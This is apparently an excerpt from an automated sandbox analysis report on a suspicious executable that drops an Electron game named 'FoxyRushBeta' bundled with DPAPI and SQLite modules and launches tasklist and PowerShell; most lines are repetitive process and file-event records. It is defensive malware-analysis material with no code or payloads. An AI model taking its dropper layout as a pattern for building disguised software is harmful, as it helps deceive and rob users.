Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: mf.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: mfplat.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: rtworkq.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: d3d12.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: d3d12.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: d3d12core.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: dxilconv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: d3dscache.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: directml.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeSection loaded: cabinet.dllJump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: bkHLzNaNMS.exeStatic file information: File size 82341697 > 1048576
Source: bkHLzNaNMS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Dev\elevate\bin\x86\Release\Elevate.pdb source: elevate.exe.0.dr
Source: Binary string: libGLESv2.dll.pdb source: libGLESv2.dll.0.dr
Source: ffmpeg.dll.0.drStatic PE information: section name: .gxfg
Source: ffmpeg.dll.0.drStatic PE information: section name: .retplne
Source: ffmpeg.dll.0.drStatic PE information: section name: _RDATA
Source: FoxyRushBeta.exe.0.drStatic PE information: section name: .gxfg
Source: FoxyRushBeta.exe.0.drStatic PE information: section name: .retplne
Source: FoxyRushBeta.exe.0.drStatic PE information: section name: .rodata
Source: FoxyRushBeta.exe.0.drStatic PE information: section name: CPADinfo
Source: FoxyRushBeta.exe.0.drStatic PE information: section name: LZMADEC
Source: FoxyRushBeta.exe.0.drStatic PE information: section name: _RDATA
Source: FoxyRushBeta.exe.0.drStatic PE information: section name: malloc_h
Source: FoxyRushBeta.exe.0.drStatic PE information: section name: prot
Source: libEGL.dll.0.drStatic PE information: section name: .gxfg
Source: libEGL.dll.0.drStatic PE information: section name: .retplne
Source: libEGL.dll.0.drStatic PE information: section name: _RDATA
Source: libGLESv2.dll.0.drStatic PE information: section name: .gxfg
Source: libGLESv2.dll.0.drStatic PE information: section name: .retplne
Source: libGLESv2.dll.0.drStatic PE information: section name: _RDATA
Source: vk_swiftshader.dll.0.drStatic PE information: section name: .gxfg
Source: vk_swiftshader.dll.0.drStatic PE information: section name: .retplne
Source: vk_swiftshader.dll.0.drStatic PE information: section name: _RDATA
Source: vulkan-1.dll.0.drStatic PE information: section name: .gxfg
Source: vulkan-1.dll.0.drStatic PE information: section name: .retplne
Source: vulkan-1.dll.0.drStatic PE information: section name: _RDATA
Source: ffmpeg.dll0.0.drStatic PE information: section name: .gxfg
Source: ffmpeg.dll0.0.drStatic PE information: section name: .retplne
Source: ffmpeg.dll0.0.drStatic PE information: section name: _RDATA
Source: FoxyRushBeta.exe0.0.drStatic PE information: section name: .gxfg
Source: FoxyRushBeta.exe0.0.drStatic PE information: section name: .retplne
Source: FoxyRushBeta.exe0.0.drStatic PE information: section name: .rodata
Source: FoxyRushBeta.exe0.0.drStatic PE information: section name: CPADinfo
Source: FoxyRushBeta.exe0.0.drStatic PE information: section name: LZMADEC
Source: FoxyRushBeta.exe0.0.drStatic PE information: section name: _RDATA
Source: FoxyRushBeta.exe0.0.drStatic PE information: section name: malloc_h
Source: FoxyRushBeta.exe0.0.drStatic PE information: section name: prot
Source: node.napi.node.0.drStatic PE information: section name: _RDATA
Source: node_sqlite3.node.0.drStatic PE information: section name: _RDATA
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeFile created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\ffmpeg.dllJump to dropped file
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeFile created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeJump to dropped file
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeFile created: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeFile created: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\resources\elevate.exeJump to dropped file
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeFile created: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\resources\app.asar.unpacked\node_modules\@primno\dpapi\prebuilds\win32-x64\node.napi.nodeJump to dropped file
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeFile created: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\vk_swiftshader.dllJump to dropped file
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeFile created: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\libEGL.dllJump to dropped file
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeFile created: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\ffmpeg.dllJump to dropped file
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeFile created: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\nsis7z.dllJump to dropped file
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeFile created: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\libGLESv2.dllJump to dropped file
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeFile created: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\resources\app.asar.unpacked\node_modules\sqlite3\build\Release\node_sqlite3.nodeJump to dropped file
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeFile created: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\System.dllJump to dropped file
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeFile created: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\vulkan-1.dllJump to dropped file
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeFile created: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\FoxyRushBeta.exeJump to dropped file
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeFile created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeFile created: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\resources\app.asar.unpacked\node_modules\@primno\dpapi\prebuilds\win32-x64\node.napi.nodeJump to dropped file
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeFile created: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\resources\app.asar.unpacked\node_modules\sqlite3\build\Release\node_sqlite3.nodeJump to dropped file
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeFile created: C:\Users\user\AppData\Local\Temp\nsdDF38.tmp\7z-out\LICENSE.electron.txtJump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeFile created: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\LICENSE.electron.txtJump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\bkHLzNaNMS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2txRQPQYxmAp3e00pPrO83ZJr7Q\FoxyRushBeta.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
